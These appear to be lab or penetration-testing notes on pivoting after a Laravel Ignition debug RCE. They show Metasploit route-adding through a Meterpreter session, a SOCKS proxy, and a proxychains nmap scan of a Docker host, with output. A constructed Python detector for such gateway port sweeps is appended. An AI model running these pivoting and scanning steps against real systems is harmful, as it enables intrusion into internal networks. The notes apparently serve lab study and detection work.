## Command

Routing the Service
```
# The discovered webserice_database IP will be routed through the Meterpreter session
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.28.101.51/32 -1
[*] Route added
```

- website_databse ---> This is from the .env variable in the docker file ()

Routing Machine
```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.17.0.1/32 -1
[*] Route added
```

Check the routing settings
```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.17.0.1         255.255.255.255    Session 3
   172.28.101.51      255.255.255.255    Session 3

[*] There are currently no IPv6 routes defined.
```

Set Up SOCKS Proxy
```
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.

[*] Starting the SOCKS proxy server
```

Using the target machine
```
# From the attacker’s host machine, we can use curl with the internal Docker IP to show that the web application is running and that the SOCKS proxy works
$ curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v

… etc …

# From the attacker’s host machine, we can use ProxyChains to scan the compromised host machine for common ports
$ proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 172.17.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 08:48 EDT
Nmap scan report for 172.17.0.1
Host is up (0.069s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
443/tcp  closed https
5432/tcp closed postgresql

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
```
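
Detection view of the port scan above, as an added example that is not part of the original notes: because the scan is relayed through the session, the Docker host sees a container address opening TCP connections to several ports on the bridge gateway 172.17.0.1 in quick succession. The log lines, the container addresses 172.17.0.2 and 172.17.0.3, the `docker0` interface, and the `find_gateway_sweeps` function are constructed assumptions; they presume an iptables LOG rule for new TCP connections on the host.

```python
import re
from collections import defaultdict

# Constructed, simplified kernel log lines (not from the page). They assume an
# iptables LOG rule on the Docker host for new TCP connections on docker0.
SAMPLE_LOG = """\
[ 5021.104] IN=docker0 OUT= SRC=172.17.0.2 DST=172.17.0.1 PROTO=TCP SPT=41810 DPT=22 SYN
[ 5021.131] IN=docker0 OUT= SRC=172.17.0.2 DST=172.17.0.1 PROTO=TCP SPT=41812 DPT=80 SYN
[ 5021.160] IN=docker0 OUT= SRC=172.17.0.2 DST=172.17.0.1 PROTO=TCP SPT=41814 DPT=443 SYN
[ 5021.187] IN=docker0 OUT= SRC=172.17.0.2 DST=172.17.0.1 PROTO=TCP SPT=41816 DPT=5432 SYN
[ 5300.002] IN=docker0 OUT= SRC=172.17.0.3 DST=172.17.0.1 PROTO=TCP SPT=50210 DPT=5432 SYN
[ 5301.514] IN=docker0 OUT= SRC=172.17.0.3 DST=172.17.0.1 PROTO=TCP SPT=50212 DPT=5432 SYN
"""

LINE_RE = re.compile(
    r"\[\s*(?P<ts>\d+\.\d+)\]\s+IN=(?P<iface>\S+).*?SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+)"
    r".*?PROTO=TCP.*?DPT=(?P<dpt>\d+).*?\bSYN\b"
)

def find_gateway_sweeps(log_text, gateway="172.17.0.1", iface="docker0",
                        min_ports=3, window=5.0):
    """Return {container_ip: sorted ports} for sources that opened connections
    to >= min_ports distinct gateway ports within `window` seconds."""
    events = defaultdict(list)  # src -> [(timestamp, dest port), ...]
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and m["iface"] == iface and m["dst"] == gateway:
            events[m["src"]].append((float(m["ts"]), int(m["dpt"])))
    flagged = {}
    for src, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Advance the window start until it spans at most `window` seconds
            while hits[end][0] - hits[start][0] > window:
                start += 1
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) >= min_ports:
                flagged[src] = sorted(set(flagged.get(src, [])) | ports)
    return flagged

if __name__ == "__main__":
    for src, ports in find_gateway_sweeps(SAMPLE_LOG).items():
        print(f"{src} probed {len(ports)} gateway ports within the window: {ports}")
```

In the constructed sample, 172.17.0.3 repeatedly reaching a single port is not flagged; only the source that touches several distinct gateway ports inside the window is reported.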